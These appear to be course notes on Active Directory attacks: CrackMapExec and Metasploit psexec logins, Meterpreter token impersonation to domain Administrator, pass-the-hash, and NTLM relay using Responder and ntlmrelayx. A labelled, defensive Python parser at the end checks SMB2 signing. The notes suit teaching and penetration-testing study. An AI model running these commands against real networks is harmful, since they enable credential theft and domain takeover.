# Week 9: NTLM

**Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

## Important Readings

{% embed url="<https://www.fuzzysecurity.com/tutorials/16.html>" %}

{% embed url="<https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa>" %}

## Notes

### CrackMapExec and psexec

* install crackmapexec

![crackmapexec smb \<ip range> -u Administrator -p 'P@$$word!' -d MARVEL](/files/-MFJ0An9CtdMNWQejP8_)

* msf5 > use exploit/windows/smb/psexec

![](/files/-MFJ0j6ZIYA1NgGG5bMA)

* try all the target options for psexec: `set target 3`
  * Automatic
  * Powershell
  * Native Upload
  * MOF upload
* `sysinfo`
  * x64 architecture but a 32-bit Meterpreter
  * sometimes you can look through the payloads and find a better-matching one

```
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator
```

In a meterpreter shell, type `load` and hit Tab twice to see all the extensions available to load, e.g. kiwi, mimikatz.

```
# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps
```

* Process migration: migrate into an x64 process to get an x64 Meterpreter shell

![](/files/-MFJ4GZJP-pLD5Pg2Dto)

* The local Administrator password could be the same across many computers if IT images them from the same base image.
* You can pass the hash with `crackmapexec -H` or with `psexec`

### NTLM Relay

If SMB communications are not digitally signed, NTLM authentication can be relayed. SMB signing is off by default.

* Heath demonstrates an environment where a user has administrative privileges on multiple machines.
* Edit `Responder.conf`: turn off the SMB and HTTP servers.
* Start `Responder.py -I eth0 -rdw`
  * Wait

![](/files/-MFJ8KlfytYa5sQErviV)

```
locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support
```

* Point a victim machine at yours in File Explorer, e.g. `\\192.168.202.173`
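Added example (not from the course or the notes above): a small Python parser that reads the SecurityMode field of an SMB2 NEGOTIATE response and reports whether signing is merely enabled or actually required, which is the setting that decides whether the relay above works against a given host. The response bytes are constructed test vectors, not captures; the field offsets follow MS-SMB2.

```python
"""Audit an SMB2 NEGOTIATE response for the signing setting that decides
whether a host accepts unsigned sessions (the NTLM relay precondition).
Offsets follow MS-SMB2 2.2.1.2 (header) and 2.2.4 (NEGOTIATE response)."""
import struct

SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
SMB2_NEGOTIATE = 0x0000    # Command field value for NEGOTIATE
FLAGS_RESPONSE = 0x0001    # SMB2_FLAGS_SERVER_TO_REDIR

def parse_negotiate_response(pkt: bytes) -> dict:
    """Return dialect and signing flags from a raw SMB2 NEGOTIATE response."""
    if pkt[:1] == b"\x00":          # strip the 4-byte direct-TCP length prefix
        pkt = pkt[4:]
    if pkt[:4] != b"\xfeSMB" or len(pkt) < 64 + 65:
        raise ValueError("not an SMB2 message")
    hdr_size, command, flags = struct.unpack_from("<H6xH2xI", pkt, 4)
    if hdr_size != 64 or command != SMB2_NEGOTIATE or not flags & FLAGS_RESPONSE:
        raise ValueError("not a NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    return {
        "dialect": f"0x{dialect:04x}",
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }

def relay_exposure(pkt: bytes) -> str:
    """One-line verdict in the terms used in the notes above."""
    info = parse_negotiate_response(pkt)
    if info["signing_required"]:
        return f"{info['dialect']}: signing required, relay blocked"
    return f"{info['dialect']}: signing not required, relayable"

def build_sample_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed test vector (not a real capture) with the given SecurityMode."""
    header = b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE,
                                      1, FLAGS_RESPONSE, 0, 0, 0, 0, 0) + b"\x00" * 16
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x00" * 16, 0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    msg = header + body + b"\x00"                       # 1-byte Buffer, 129 bytes total
    return b"\x00" + len(msg).to_bytes(3, "big") + msg  # direct-TCP framing

if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        print(relay_exposure(build_sample_response(mode)))
```

To audit a real host, feed `parse_negotiate_response` the server's reply to an SMB2 NEGOTIATE taken from a packet capture; a workstation that reports `signing_enabled` without `signing_required` is the case the notes describe.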
